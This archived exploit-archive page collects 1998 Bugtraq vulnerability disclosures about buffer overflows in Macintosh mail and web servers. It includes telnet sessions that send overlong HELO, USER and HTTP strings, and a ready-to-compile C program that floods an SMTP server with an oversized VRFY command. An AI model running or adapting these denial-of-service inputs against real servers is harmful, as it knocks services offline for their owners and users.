Overflows in various Macintosh mail clients.
Summary |
---|
Description: | Standard overflows. |
Author: | Chris Wedgwood <chris@CYBERNET.CO.NZ> |
Compromise: | DOS attack at least, there is at least a possibility of remote code execution (I've never seen this done on a Mac though). |
Vulnerable Systems: | Macintosh boxes running Stalker Internet Mail Server V.1.6 or AppleShare IP Mail Server 5.0.3 SMTP Server |
Date: | 8 April 1998 |
Details |
---|
Date: Wed, 8 Apr 1998 13:11:17 +1200 From: Chris Wedgwood <chris@CYBERNET.CO.NZ> To: BUGTRAQ@NETSPACE.ORG Subject: AppleShare IP Mail Server [Yet another buffer overrun? - I hope this isn't getting monotonous] I noticed this a while back but haven't seen any else mention it. There appears to be what looks like a buffer overrun problem with AppleShare IP Mail Server. If you connect to the SMTP port and issue a long string (say 500 bytes or so) the server crashes - and because its a Mac, it usually crashed the whole machine to the point where it needs a reboot. So far I've only tested against servers which emit the banner 'AppleShare IP Mail Server 5.0.3' For example: $ telnet some.where Trying 1.2.3.4... Connected to some.where. Escape character is '^]'. 220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready HELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX [ and it just hangs ] $ ping some.where [ ...nothing... ] Physically checking the machine shows it has `locked up' and it a reboot. I assume if you can cause a crash without the lockup then you might be able to execute code and so something useful (on a Mac?). -cw Date: Wed, 8 Apr 1998 12:34:09 +0800 From: David Luyer <luyer@UCS.UWA.EDU.AU> To: BUGTRAQ@NETSPACE.ORG Subject: Re: AppleShare IP Mail Server Chris Wedgewood wrote: > 220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready > HELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX > [ and it just hangs ] Same with 220-Stalker Internet Mail Server V.1.6 is ready. 220 ESMTP is spoken here. HELO xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx [dead] But then, isn't that expected of using toy machines (Macs/Win PCs) for servers? David. Date: Tue, 14 Apr 1998 10:01:05 -0400 (EDT) From: Netstat WebmasterSubject: MacOS based buffer overflows... Eudora Internet Mail Server vs. 1.2, 2.0, 2.01 DoS Telnet to port 106 of an EIMS server. Type USER xxxxxxxxxxxx(at least a 1000+ char string). EIMS will crash. Occasionally taking the entire machine with it. --- Apple's Web Sharing DoS Telnet to port 80 of a Web Sharing server (built into system 8.0+). Upon connect enter any string of at least 3000+ characters. Hit return twice, Web Sharing will stop servicing. It does not seem to make the server any less stable and Web Sharing seems to be able to be restarted with out a reboot and without any ill effects. Phanty.
Date: Wed, 8 Apr 1998 07:10:25 -0400
From: Jon Beaton <steven@EFNI.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: smtp overflows
There have been more posts about the buffer overflows on smtp daemons, so I thought this may be useful. After posting about these attacks on SLMail and Imail, I found that there were alot more that were still affected. On the few I've tried on the Mac, like Mercury, it had locked the server up, much like Appleshare. Anyways, this is just mdaemon.c with just a few tiny changes, just thought it may be useful. Btw, I just wanted to note that this will also crash IMail, even though the author has said it wasn't affected.
Jon
/*
mdaemon.c with a few small changes.
known to lock up the whole server with some daemons on the Mac
Cisc0 @ Undernet
*/
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
void main(int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *hp;
char *buffer;
int sock, i;
if (argc != 2) {
printf("usage: %s <smtp server>\n", argv[0]); exit(1);
}
hp = gethostbyname(argv[1]);
if (hp==NULL) {
printf("Unknown host: %s\n",argv[1]); exit(1);
}
bzero((char*) &sin, sizeof(sin));
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = htons(25);
sock = socket(AF_INET, SOCK_STREAM, 0);
connect(sock,(struct sockaddr *) &sin, sizeof(sin));
buffer = (char *)malloc(1000);
sprintf(buffer, "VRFY ");
for (i = 0; i<896; i++)
strcat(buffer, "d");
strcat(buffer, "\r\n");
write(sock, &buffer[0], strlen(buffer));
close(sock);
free(buffer);
}
More Exploits! |
---|
The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's | Linux | Solaris/SunOS | Micro$oft |
*BSD | Macintosh | AIX | IRIX |
ULTRIX/Digital UNIX | HP/UX | SCO | Remote exploits |
This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: